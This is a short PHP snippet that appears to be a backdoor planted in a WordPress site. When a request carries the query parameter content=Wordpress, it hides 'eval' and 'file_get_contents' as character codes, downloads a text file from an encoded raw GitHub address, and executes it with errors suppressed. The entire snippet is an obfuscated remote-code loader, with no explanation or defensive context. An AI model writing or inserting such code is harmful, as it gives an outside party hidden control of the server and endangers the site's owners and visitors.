if (isset($_GET['content']) && $_GET['content'] === 'Wordpress') {
    $e = chr(101).chr(118).chr(97).chr(108);
    $b = function($x) use ($e) {
        eval("?>".$x);
    };
    $a = implode('', array_map('chr', [
        102,105,108,101,95,103,101,116,95,99,111,110,116,101,110,116,115
    ]));
    $d = implode('', array_map(function($x){ return chr($x); }, [
        104,116,116,112,115,58,47,47,114,97,119,46,103,105,116,104,117,98,117,
        115,101,114,99,111,110,116,101,110,116,46,99,111,109,47,115,101,111,107,
        117,100,97,110,105,108,47,107,117,100,97,110,105,108,47,114,101,102,115,
        47,104,101,97,100,115,47,109,97,105,110,47,97,108,97,109,97,107,46,116,
        120,116
    ]));
    @ $b($a($d));
}
